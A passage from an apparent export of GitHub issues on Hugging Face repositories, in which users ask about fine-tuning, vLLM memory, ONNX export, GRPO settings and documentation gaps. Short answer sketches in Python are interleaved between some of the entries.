      "dataset",
      "stale"
    ],
    "created_at": "2025-02-18T12:33:07Z",
    "updated_at": "2025-10-19T02:32:17Z",
    "user": "shi-akihi"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 741,
    "title": "Inquiry on Implementing NoMaD Model (Transformers and Diffusion Policy)",
    "body": "I am planning to implement the NoMaD model, which combines Transformers and Diffusion Policy, within the LeRobot project. Before proceeding, I wanted to check if anyone else is currently working on or has already started implementing this model.\n\nFor reference, here are the relevant resources:\n\nWebsite: https://general-navigation-models.github.io/nomad/\nPaper: https://arxiv.org/pdf/2310.07896\n\nPlease let me know if there is ongoing work related to this model or if anyone is interested in collaborating.",
    "url": "https://github.com/huggingface/lerobot/issues/741",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-17T19:57:23Z",
    "updated_at": "2025-10-08T20:56:42Z",
    "user": "vaishanth-rmrj"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 738,
    "title": "convert simulation data of insertion from v1 to v2",
    "body": "I cannot convert using the file (datasets/v2/convert_dataset_v1_to_v2.py) which requires robotconfig which I don't have\n\nI just want to convert your data on lerobot/act_aloha_sim_transfer_cube_human",
    "url": "https://github.com/huggingface/lerobot/issues/738",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-17T11:00:38Z",
    "updated_at": "2025-10-08T08:59:52Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 340,
    "title": "About the data using in sft,  how to set SFTConfig.dataset_text_field?",
    "body": "how to use the HuggingFaceH4/Bespoke-Stratos-17k in sft.\n\nI find there are two items in the data, \"system\" and \"conversations\". So, when I download this data and to finetune a LLM such as Qwen2.5-1.5B-Instruct, how to organize the data,  in trl SFTConfig has a default parameter named dataset_text_field, it's default value is \"text\" which is not exists in such data, I mean Bespoke-Stratos-17k .",
    "url": "https://github.com/huggingface/open-r1/issues/340",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-17T07:06:14Z",
    "updated_at": "2025-02-20T08:59:49Z",
    "user": "ItGirls"
  },
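For the question above, one approach is to render the conversations into a plain "text" column so SFTConfig's default `dataset_text_field` applies. A hedged sketch, assuming ShareGPT-style "from"/"value" turns (verify the actual schema of Bespoke-Stratos-17k before relying on these key names):

```python
from datasets import load_dataset
from transformers import AutoTokenizer

tok = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-1.5B-Instruct")
ds = load_dataset("HuggingFaceH4/Bespoke-Stratos-17k", split="train")

def to_text(example):
    # Assumption: each turn carries "from"/"value" keys; adapt if the schema differs.
    role_map = {"human": "user", "gpt": "assistant", "system": "system"}
    messages = [{"role": "system", "content": example["system"]}]
    messages += [
        {"role": role_map.get(turn["from"], "user"), "content": turn["value"]}
        for turn in example["conversations"]
    ]
    return {"text": tok.apply_chat_template(messages, tokenize=False)}

ds = ds.map(to_text)  # now dataset_text_field="text" resolves
```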
  {
    "repo": "huggingface/finetrainers",
    "number": 264,
    "title": "How to set --precompute_conditions for CogvideoI2V training?",
    "body": "cause i don't find this feature in Image2Video training.\ndoes it exist?",
    "url": "https://github.com/huggingface/finetrainers/issues/264",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-17T06:00:50Z",
    "updated_at": "2025-03-05T03:49:05Z",
    "user": "BlackTea-c"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10805,
    "title": "is there inpainiting dataset and parameters example provided for xl training?",
    "body": "**What API design would you like to have changed or added to the library? Why?**\n\n**What use case would this enable or better enable? Can you give us a code example?**\n\nHi patil-suraj @patil-suraj , appreciated for the convenient script ! Is there any code example and dataset example to run the script: https://github.com/huggingface/diffusers/blob/inpainting-script/examples/inpainting/train_inpainting_sdxl.py ?",
    "url": "https://github.com/huggingface/diffusers/issues/10805",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-17T01:56:14Z",
    "updated_at": "2025-02-17T02:03:09Z",
    "comments": 2,
    "user": "fire2323"
  },
  {
    "repo": "huggingface/gsplat.js",
    "number": 109,
    "title": "Info request: How to update individual points in splat?",
    "body": "I would like to update position of individual points dynamically in order to create animations and effects.\nWhat would be the optimal way to do it?\n",
    "url": "https://github.com/huggingface/gsplat.js/issues/109",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-16T18:11:14Z",
    "updated_at": "2025-02-16T18:43:23Z",
    "user": "sjovanovic"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10803,
    "title": "SANARubber a flexible version of SANA with i2i and multidiffusion/regional diffusion",
    "body": "### Model/Pipeline/Scheduler description\n\nI made a pipeline that is as reliable as the basic SANA pipeline but more flexible by making it run an array of functions which runs everything the og pipeline does. this can make easy combinations if necessary. \n\nhere's the link, enjoy\nhttps://github.com/alexblattner/SANARubber\n\nexample of multidiffusion in sana:\n['bright moon','red','blue','green','black'] (first prompt is applied in the background\n[\"0:0-512:512\",\"512:0-1024:512\",\"512:1024-1024:1024\",\"0:512-512:1024\"] those are the areas of the rest of the prompts\n[.7,.7,.7,.7] those are the strengths of the areas applied with their prompts\n\n![Image](https://github.com/user-attachments/assets/98e207f5-a229-4a91-9349-6824095bc50c)\n\nagain with i2i at stength .5 and the same settings as before (mild changes only):\n\n![Image](https://github.com/user-attachments/assets/65329495-ea25-42e4-b8f7-d4fbc4be8a19)\n\n\n\nENJOY!\n\n### Open source status\n\n- [x] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10803",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-16T15:08:11Z",
    "updated_at": "2025-03-19T15:03:31Z",
    "comments": 1,
    "user": "alexblattner"
  },
  {
    "repo": "huggingface/candle",
    "number": 2774,
    "title": "Dumb Question: How to do forward hooks ?",
    "body": "For example I want to extract activations of intermediate layers. How do I register forward hooks similar to PyTorch or is there a similar/comparable paradigm in candle for this ?",
    "url": "https://github.com/huggingface/candle/issues/2774",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-16T12:41:26Z",
    "updated_at": "2025-02-16T12:41:26Z",
    "user": "pzdkn"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10799,
    "title": "Effective region mask for controlnet",
    "body": "Hi, I just want to ask is there any way to use controlnet with mask like [this](https://github.com/Mikubill/sd-webui-controlnet/discussions/2831)\n\nAs you know comfyui, webui support effective region (mask for controlnet affect).\nBut I can't find how to do this with diffusers.",
    "url": "https://github.com/huggingface/diffusers/issues/10799",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-15T17:42:20Z",
    "updated_at": "2025-04-03T04:01:37Z",
    "comments": 8,
    "user": "Suprhimp"
  },
  {
    "repo": "huggingface/swift-coreml-diffusers",
    "number": 102,
    "title": "Question: how to use in my own swift project for inference?",
    "body": "How would I run diffusers on device on all apple devices in my swift Xcode project?",
    "url": "https://github.com/huggingface/swift-coreml-diffusers/issues/102",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-15T15:56:36Z",
    "updated_at": "2025-02-15T15:56:36Z",
    "user": "SpyC0der77"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1194,
    "title": "How do I know which ONNX transformation models are available? (Errors when loading models with CDN)",
    "body": "### Question\n\nI am using a CDN to load the models, as shown in the code below. \nI filtered the models in HuggingFace the way you recommend (text-generation, transformers.js) and put the id of the model I looked up. As I understand it, to change the model, I only need to change the model id. \nHowever, I get an error for each of the below models.\n\n`Uncaught (in promise) TypeError: Cannot read properties of undefined (reading 'model')`\n\n- **HuggingFaceTB/SmolLM2-135M-Instruct**\n- **Xenova/codegen-350M-mono**\n...\n\n`Uncaught (in promise) Error: Can't create a session. ERROR_CODE: 1, ERROR_MESSAGE: Deserialize tensor model.layers.4.mlp.gate_proj.MatMul.weight_Q4 failed.Failed to load external data file \"\"model_q4f16.onnx_data\"\", error: Module.MountedFiles is not available.`\n\n- **onnx-community/Phi-3.5-mini-instruct-onnx-web**\n...\n\nI'm ultimately saying that I don't know what model will be available.\nAdditionally, I was wondering if there is a way to know 'in advance' which 'dtype' and 'device' can be supported.\n\n```\n  import { pipeline } from 'https://cdn.jsdelivr.net/npm/@huggingface/transformers@3.3.3';\n\n    generator = await pipeline('text-generation', 'onnx-community/DeepSeek-R1-Distill-Qwen-1.5B-ONNX', {\n      dtype: \"auto\",\n      device: \"auto\",\n    });\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1194",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-15T10:31:32Z",
    "updated_at": "2025-02-16T14:02:08Z",
    "user": "mz-imhj"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 333,
    "title": "how to use tensorboard instead of wandb\uff1f",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/333",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-15T08:00:06Z",
    "updated_at": "2025-02-15T08:02:35Z",
    "user": "ngrxmu"
  },
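For the tensorboard question above: open-r1's recipes sit on top of transformers `TrainingArguments`, so switching the reporter is plausibly a one-field config change (a sketch, assuming the field is forwarded unchanged):

```python
from transformers import TrainingArguments

# Assumption: the open-r1 recipe passes these fields through to TrainingArguments.
args = TrainingArguments(
    output_dir="out",
    report_to=["tensorboard"],  # instead of ["wandb"]
    logging_dir="out/runs",     # where the TensorBoard event files land
)
```

Event files can then be viewed with `tensorboard --logdir out/runs`.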
  {
    "repo": "huggingface/diffusers",
    "number": 10796,
    "title": "Docs for HunyuanVideo LoRA?",
    "body": "### Describe the bug\n\nAs it seems like LoRA loading on HunyuanVideo has been implemented, I wonder where I can find the docs on this? Are they missing?\n\n### Reproduction\n\nSearch for HunyuanVideo and LoRA\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nAs it is the online docs...\n\n### Who can help?\n\n@stevhliu @sayakpaul ",
    "url": "https://github.com/huggingface/diffusers/issues/10796",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-02-15T04:31:34Z",
    "updated_at": "2025-06-10T20:52:28Z",
    "comments": 9,
    "user": "tin2tin"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 328,
    "title": "How to set generation sampling parameters?",
    "body": "Need to use deepseek reference settings of temperature=0.6, top_p=0.95. \n\nGreedy sampling does poorly on AIME:\n\n## r1-1.5B\n- AIME24: 23.33%\n\nTried to refer to lighteval docs and ran into issues using model config:\n```\nmodel: # Model specific parameters\n  base_params:\n    model_args: \"pretrained=Qwen/Qwen2.5-7B-Instruct,dtype=bfloat16,max_model_length=768,gpu_memory_utilisation=0.7\" # Model args that you would pass in the command line\n  generation: # Generation specific parameters\n    temperature: 1.0\n    stop_tokens: null\n    truncate_prompt: false\n```\n\nrun with:\n```\nTASK=aime24 lighteval vllm \\\n    \"config.yaml\" \\\n    \"custom|$TASK|0|0\" \\\n    --custom-tasks tasks.py \\\n    --use-chat-template \\\n    --output-dir ./results/\n```\n\nhitting:\n```\nTypeError: expected str, bytes or os.PathLike object, not dict\n```\n\n[ref](https://github.com/huggingface/lighteval/issues/563)",
    "url": "https://github.com/huggingface/open-r1/issues/328",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-14T21:42:28Z",
    "updated_at": "2025-02-20T03:28:53Z",
    "user": "rawsh"
  },
  {
    "repo": "huggingface/trl",
    "number": 2864,
    "title": "How to train GPRO on 2 GPUs, one for training, one for vllm",
    "body": "### Reproduction\n\nWhen I use `Qwen2.5-3B-instruct` to train GRPO, the device for vllm always appear OOM when loading weights. II used two GPUs with 32GB of memory, one device for training, another for vllm. I dont know why a 3B model using so much memory on `device 1`\n\n![Image](https://github.com/user-attachments/assets/79dfd03c-d123-496d-9fcc-07afc3027dff)\n\narguments settings:\n```yaml\nper_device_train_batch_size: 8\ngradient_accumulation_steps: 8\nnum_generations: 8\nuse_vllm: true\nvllm_gpu_memory_utilization: 0.8\nuse_peft: true\nlora_r: 64\nlora_alpha: 64\nload_in_4bit: true\nuse_bnb_nested_quant: true\nattn_implementation: flash_attention_2\nbf16: true\n...\n```\n\nStart command:\n```shell\nexport CUDA_VISIBLE_DEVICES=0,1\naccelerate launch --num_processes 1 train_Datawhale-R1.py --config Datawhale-R1.yaml\n```\n\n### System Info\n\n- Platform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n- Python version: 3.10.8\n- PyTorch version: 2.5.1\n- CUDA device(s): NVIDIA vGPU-32GB, NVIDIA vGPU-32GB\n- Transformers version: 4.48.3\n- Accelerate version: 1.3.0\n- Accelerate config: not found\n- Datasets version: 3.1.0\n- HF Hub version: 0.27.0\n- TRL version: 0.16.0.dev0+ffcb9f4\n- bitsandbytes version: 0.45.2\n- DeepSpeed version: 0.16.3\n- Diffusers version: 0.32.2\n- Liger-Kernel version: not installed\n- LLM-Blender version: not installed\n- OpenAI version: 1.59.7\n- PEFT version: 0.14.0\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/2864",
    "state": "open",
    "labels": [
      "\u26a1 PEFT",
      "\u23f3 needs more info",
      "\u26a1accelerate",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-14T15:00:58Z",
    "updated_at": "2025-03-12T12:00:10Z",
    "user": "AIR-hl"
  },
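A note on the OOM above: vLLM preallocates the `vllm_gpu_memory_utilization` fraction of the whole device (weights plus KV cache), so 0.8 on a 32 GB card reserves roughly 25.6 GB regardless of model size. A hedged sketch of the usual first mitigation, assuming the GRPOConfig fields named in the YAML above exist in the installed TRL version:

```python
# Sketch, assuming the installed TRL exposes the fields used in the YAML above.
from trl import GRPOConfig

config = GRPOConfig(
    output_dir="grpo-qwen2.5-3b",
    per_device_train_batch_size=8,
    gradient_accumulation_steps=8,
    num_generations=8,
    use_vllm=True,
    # vLLM reserves this fraction of the entire GPU up front;
    # lowering it leaves headroom while weights are being loaded.
    vllm_gpu_memory_utilization=0.4,
    bf16=True,
)
```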
  {
    "repo": "huggingface/peft",
    "number": 2377,
    "title": "Contributing new model merging method to PEFT",
    "body": "### Feature request\n\nHi all,\nI noticed that several model merging methods, such as TIES and DARE, have been implemented in this library, as mentioned [here](https://github.com/huggingface/peft/blob/main/docs/source/developer_guides/model_merging.md).\n\nI was wondering if there is a way for me to contribute a recently accepted model merging method to this repo.\n\nI would really appreciate any guidance or suggestions on how to proceed.\n\nThanks in advance!\n\n\n### Motivation\n\nEnhance the diversity of model merging supported in this library.\n\n### Your contribution\n\nI can submit a PR.",
    "url": "https://github.com/huggingface/peft/issues/2377",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-14T12:17:46Z",
    "updated_at": "2025-03-24T15:04:11Z",
    "comments": 2,
    "user": "SpeeeedLee"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2189,
    "title": "PEFT to ONNX conversion",
    "body": "### System Info\n\n```shell\nHello! \nI have a fine-tuned LLM model from Hugging Face saved in PEFT format, and it\u2019s about 2.1 GB. When we convert it to ONNX, its size nearly doubles to about 4.1 GB. What causes this significant increase in model size after converting from PEFT to ONNX? Is there any bug under this conversion? ( Here is the code do this conversion. Need to mention: loading it in any commented formats will kill the accuracy). Thanks\n\nmodel = ORTModelForCausalLM.from_pretrained(\n            peft_path,\n            provider='OpenVINOExecutionProvider',\n            provider_options={'device_type': 'GPU_FP16'},\n            # use_cache=False,\n            #use_io_binding=False\n            export=True,\n            #load_in_4bit=True,\n            #load_in_8bit=True\n            #torch_dtype=torch.bfloat16,\n            #device_map=device,\n            #from_transformers=True\n        )\ntokenizer = AutoTokenizer.from_pretrained(peft_path)\nmodel.save_pretrained(onnex_path)\ntokenizer.save_pretrained(onnex_path)\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nmodel = ORTModelForCausalLM.from_pretrained(\n            peft_path,\n            provider='OpenVINOExecutionProvider',\n            provider_options={'device_type': 'GPU_FP16'},\n            # use_cache=False,\n            #use_io_binding=False\n            export=True,\n            #load_in_4bit=True,\n            #load_in_8bit=True\n            #torch_dtype=torch.bfloat16,\n            #device_map=device,\n            #from_transformers=True\n        )\ntokenizer = AutoTokenizer.from_pretrained(peft_path)\nmodel.save_pretrained(onnex_path)\ntokenizer.save_pretrained(onnex_path)\n\n### Expected behavior\n\nI need to have the OONX model with at least the same size while not loosing accuracy performance.",
    "url": "https://github.com/huggingface/optimum/issues/2189",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-13T18:21:05Z",
    "updated_at": "2025-03-10T13:58:28Z",
    "comments": 2,
    "user": "morteza89"
  },
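One plausible (unconfirmed) explanation for the roughly 2x growth above is an fp16 PEFT checkpoint being exported as fp32 ONNX. A sketch of something to try before exporting: merge the adapter into the base model while keeping fp16, then export the merged directory. `peft_path` is the placeholder directory from the issue:

```python
# Sketch (assumption, not a confirmed fix): merge the LoRA adapter in fp16
# first, then export the merged model instead of the raw PEFT directory.
import torch
from peft import AutoPeftModelForCausalLM
from transformers import AutoTokenizer

peft_path = "path/to/peft_model"  # placeholder
merged_dir = "merged_fp16"

model = AutoPeftModelForCausalLM.from_pretrained(peft_path, torch_dtype=torch.float16)
model = model.merge_and_unload()  # fold the adapter weights into the base model
model.save_pretrained(merged_dir)
AutoTokenizer.from_pretrained(peft_path).save_pretrained(merged_dir)
# Then point ORTModelForCausalLM.from_pretrained(merged_dir, export=True) at merged_dir.
```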
  {
    "repo": "huggingface/agents-course",
    "number": 113,
    "title": "Show how to use Inference Providers for inference",
    "body": "Can be helpful for students to explore different models easily.\n",
    "url": "https://github.com/huggingface/agents-course/issues/113",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-13T07:46:01Z",
    "updated_at": "2025-02-13T08:04:58Z",
    "user": "pcuenca"
  },
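A minimal sketch of what such a docs snippet could look like, assuming a recent huggingface_hub that accepts a `provider` argument on InferenceClient; the provider name, model id, and token are illustrative:

```python
# Illustrative sketch of Inference Providers usage via huggingface_hub.
from huggingface_hub import InferenceClient

client = InferenceClient(provider="together", api_key="hf_xxx")  # placeholder token
completion = client.chat.completions.create(
    model="deepseek-ai/DeepSeek-R1",  # swap in any provider-served model
    messages=[{"role": "user", "content": "What is an AI agent?"}],
    max_tokens=256,
)
print(completion.choices[0].message.content)
```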
  {
    "repo": "huggingface/lerobot",
    "number": 718,
    "title": "Hand-Eye Calibration for LeRobot",
    "body": "Hello,\nI am starting a project where I plan to use LeRobot for pick-and-place tasks utilizing classical robotics and vision techniques. I am wondering if anyone has experience with performing hand-eye calibration for this robot.\nMy major concern is that the high-mounted camera is usually parallel to the arm, which may make it difficult for the camera to see the Aruco marker. Does anyone have any suggestions or insights on how to approach this?\nThank you!",
    "url": "https://github.com/huggingface/lerobot/issues/718",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-12T05:44:09Z",
    "updated_at": "2025-12-21T02:59:43Z",
    "user": "Akumar201"
  },
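For the calibration step itself (setting aside marker visibility), OpenCV's hand-eye solver is the standard classical route. A sketch assuming N paired samples of arm forward kinematics and marker detections can be collected:

```python
# Sketch: classical hand-eye calibration with OpenCV. For a camera fixed in the
# workspace (eye-to-hand), OpenCV's docs say to pass base->gripper transforms
# in place of gripper->base; shown here in the generic form.
import cv2

R_gripper2base, t_gripper2base = [], []  # from the arm's forward kinematics
R_target2cam, t_target2cam = [], []      # from cv2.solvePnP on the ArUco marker
# ... append one 3x3 rotation and 3x1 translation per robot pose ...

R_cam2gripper, t_cam2gripper = cv2.calibrateHandEye(
    R_gripper2base, t_gripper2base,
    R_target2cam, t_target2cam,
    method=cv2.CALIB_HAND_EYE_TSAI,
)
```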
  {
    "repo": "huggingface/optimum-neuron",
    "number": 782,
    "title": "Docs on how to compile a pre-trained transformer",
    "body": "Hello,\n\nI am experimenting with Transformers and trying to run them on AWS Inferentia.\n\nI checked the official [docs](https://huggingface.co/docs/optimum-neuron/index) but I could not find a clear answer to my current problem.\n\nI currently have a customized model based on the [ALBERT transformer](https://huggingface.co/docs/transformers/en/model_doc/albert) that I fine-tuned and for which I exported the weights.\n\n```python\nfrom transformers import AlbertConfig, AlbertModel\nimport torch\n\nconfig_dict= {\n    \"vocab_size\": 178,\n    \"hidden_size\": 768,\n    \"num_attention_heads\": 12,\n    \"intermediate_size\": 2048,\n    \"max_position_embeddings\": 512,\n    \"num_hidden_layers\": 12,\n    \"dropout\": 0.1,\n}\n\nalbert_config = AlbertConfig(**config_dict)\nmodel = AlbertModel(albert_config)\n\nweights = torch.load(\"path/to/weights.pt\")\nmodel.load_state_dict(weights)\n```\n\nMy question is, how do I go from the model above to compiling it for AWS Inferentia using the `optimum-neuron` python library programmatically? I could not find documented examples or snippets for this use-case.",
    "url": "https://github.com/huggingface/optimum-neuron/issues/782",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2025-02-11T23:36:13Z",
    "updated_at": "2025-03-20T08:05:40Z",
    "user": "efemaer"
  },
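A hedged sketch of one way this could work, assuming the optimum-neuron NeuronModel classes support `export=True` with static input shapes (the class and keyword names are drawn from the optimum-neuron API surface, not from the issue):

```python
# Sketch: save the fine-tuned AlbertModel from the snippet above, then compile
# it for Inferentia via an optimum-neuron export. Static input shapes are
# assumed to be required for Neuron compilation.
from optimum.neuron import NeuronModelForFeatureExtraction

model.save_pretrained("albert-finetuned")  # `model` from the snippet above

neuron_model = NeuronModelForFeatureExtraction.from_pretrained(
    "albert-finetuned",
    export=True,
    batch_size=1,
    sequence_length=128,
)
neuron_model.save_pretrained("albert-neuron")
```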
  {
    "repo": "huggingface/diffusers",
    "number": 10772,
    "title": "Sana Controlnet Support",
    "body": "**Is your feature request related to a problem? Please describe.**\nThe first controlnet for Sana has appeared, so the feature is to add the sana controlnet to the diffusers pipeline https://github.com/NVlabs/Sana/blob/main/asset/docs/sana_controlnet.md\n\n**Describe the solution you'd like.**\nBe able to use the sana controlnet\n\n**Describe alternatives you've considered.**\nUsing the sana repo\n\n",
    "url": "https://github.com/huggingface/diffusers/issues/10772",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue",
      "contributions-welcome",
      "roadmap"
    ],
    "created_at": "2025-02-11T22:39:10Z",
    "updated_at": "2025-04-13T13:49:40Z",
    "comments": 5,
    "user": "jloveric"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 610,
    "title": "Is this normal? Im getting this a lot",
    "body": "Hey, is this normal? \n\n![Image](https://github.com/user-attachments/assets/8da7d739-10c4-4bd3-bc1d-78db00c707bd)\n\nalso, out: None is this ok as well??",
    "url": "https://github.com/huggingface/smolagents/issues/610",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T22:05:27Z",
    "updated_at": "2025-03-19T07:12:32Z",
    "user": "Mhdaw"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 77,
    "title": "[QUESTION] Why am I able to select multiple options in Quick Quiz?",
    "body": "In quick quizzes as there is a single answer correct, shouldn't it be like only be able to choose a single option instead of being able select all at once to see correct answer?\n",
    "url": "https://github.com/huggingface/agents-course/issues/77",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T17:35:31Z",
    "updated_at": "2025-02-13T07:20:59Z",
    "user": "Devrajsinh-Gohil"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 66,
    "title": "[QUESTION] About the **Thought: Internal Reasoning and the Re-Act Approach** section of UNIT 1",
    "body": "I am a bit confused about the ReAct prompting example at the end of the **Thought: Internal Reasoning and the Re-Act Approach** section in Unit 1. The figure label describes it as an example of **ReAct**, but the image itself mentions \"Zero-shot CoT.\" Could you please take a look at this section and clarify? I would really appreciate your help!",
    "url": "https://github.com/huggingface/agents-course/issues/66",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-11T03:54:26Z",
    "updated_at": "2025-02-13T07:30:13Z",
    "user": "saidul-islam98"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7390,
    "title": "Re-add py.typed",
    "body": "### Feature request\n\nThe motivation for removing py.typed no longer seems to apply.  Would a solution like [this one](https://github.com/huggingface/huggingface_hub/pull/2752) work here?\n\n### Motivation\n\nMyPy support is broken.  As more type checkers come out, such as RedKnot, these may also be broken.  It would be good to be PEP 561 compliant as long as it's not too onerous.\n\n### Your contribution\n\nI can re-add py.typed, but I don't know how to make sur all of the `__all__` files are provided (although you may not need to with modern PyRight).",
    "url": "https://github.com/huggingface/datasets/issues/7390",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-02-10T22:12:52Z",
    "updated_at": "2025-08-10T00:51:17Z",
    "comments": 1,
    "user": "NeilGirdhar"
  },
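For context, PEP 561 compliance mostly amounts to shipping an empty `py.typed` marker file inside the package; a minimal packaging sketch (the names mirror the datasets layout but are illustrative):

```python
# Minimal PEP 561 sketch: include an empty `py.typed` marker file in the
# package so type checkers consume the inline annotations.
from setuptools import find_packages, setup

setup(
    name="datasets",
    packages=find_packages("src"),
    package_dir={"": "src"},
    package_data={"datasets": ["py.typed"]},  # ship the marker in wheels/sdists
    zip_safe=False,  # keep the marker as a real file on disk
)
```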
  {
    "repo": "huggingface/lerobot",
    "number": 707,
    "title": "is there option to run on parallel gpu",
    "body": "I have 2 gpus 4090 I wonder if there is an option to run on parallel while finetuning the model\n\nI have found this parameter here \n\n![Image](https://github.com/user-attachments/assets/d88768fe-0c93-40cd-9301-30bfd60315a9)\n\nbut I don't actually understand what do you mean by mp\n\nso if there is option for parallel gpu please tell us about it",
    "url": "https://github.com/huggingface/lerobot/issues/707",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-10T09:34:13Z",
    "updated_at": "2025-05-14T20:51:43Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 706,
    "title": "adapt_to_pi_aloha parameter",
    "body": "I am finetuning pi0 on a static aloha dataset and I found the following parameter : adapt_to_pi_aloha : false \nin /lerobot/common/policies/pi0/configuration_pi0.py \n\nbut when I set it to true the first loss increased from 0.17 to 4.7\n\nshould I set it to true or not knowing that I want the predicted actions to be in aloha space\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/706",
    "state": "open",
    "labels": [
      "question",
      "configuration"
    ],
    "created_at": "2025-02-10T09:24:45Z",
    "updated_at": "2025-07-24T08:15:35Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1708,
    "title": "Generation failed occur",
    "body": "when I ask model then get generation error \n\n![Image](https://github.com/user-attachments/assets/9cccfa87-09d6-48fb-b693-67b6ecffabd4)\n\nusing base model is llama3 -1b\n\nbelow code is my .env.local code \n\n![Image](https://github.com/user-attachments/assets/5cd50727-be1f-4081-ac80-e24fdb3e20dd)",
    "url": "https://github.com/huggingface/chat-ui/issues/1708",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-02-10T08:12:56Z",
    "updated_at": "2025-02-12T07:48:47Z",
    "comments": 5,
    "user": "mondayjowa"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 260,
    "title": "How to use tensor_parallel_size for vllm in GRPO?",
    "body": "GRPO use vllm to load reference model for data sampling , The limitation is that tensor parallel are not supported.\nWhat if the reference model is larger than One GPU can hold, for example, 72B with 40GB's H800,\n\nIs there any setting we can set the tensor_parallel_size for vllm params?\n\n```\n        if self.accelerator.is_main_process:\n                vllm_device = self.args.vllm_device\n                if vllm_device == \"auto\":\n                    vllm_device = f\"cuda:{self.accelerator.num_processes}\"  # take the next GPU idx\n                # Check that the requested device is available\n                if vllm_device.split(\":\")[0] == \"cuda\" and int(vllm_device.split(\":\")[1]) >= torch.cuda.device_count():\n                    raise ValueError(\n                        f\"The requested device for vllm ({vllm_device}) is not available. You are likely using vLLM \"\n                        \"without restricting the number of GPUs for training. Set the `--num_processes` argument to a \"\n                        \"value lower than the number of GPUs available on your machine\u2014typically, reducing it by one \"\n                        f\"is sufficient. In your case: `--num_processes {torch.cuda.device_count() - 1}`.\"\n                    )\n                # Check that the requested device is not also used for training\n                if vllm_device in {f\"cuda:{idx}\" for idx in range(self.accelerator.num_processes)}:\n                    warnings.warn(\n                        f\"The requested device {vllm_device} is also used for training. This may lead to unexpected \"\n                        \"behavior. It is recommended to use a dedicated device for vLLM.\"\n                    )\n                # vLLM is not compatible with accelerate. So we need to patch it to make sure we can (1) place the vLLM\n                # model on the desired device (world_size_patch) and (2) avoid a test that is not designed for our\n                # setting (profiling_patch).\n                world_size_patch = patch(\"torch.distributed.get_world_size\", return_value=1)\n                profiling_patch = patch(\n                    \"vllm.worker.worker.Worker._assert_memory_footprint_increased_during_profiling\", return_value=None\n                )\n                with world_size_patch, profiling_patch:\n                    self.llm = LLM(\n                        model=model.name_or_path,\n                        device=vllm_device,\n                        gpu_memory_utilization=self.args.vllm_gpu_memory_utilization,\n                        dtype=self.args.vllm_dtype,\n                        # Automatic Prefix Caching caches the KV cache of existing queries, so that a new query can\n                        # directly reuse the KV cache if it shares the same prefix with one of the existing queries.\n                        # This is particularly useful here because we generate completions 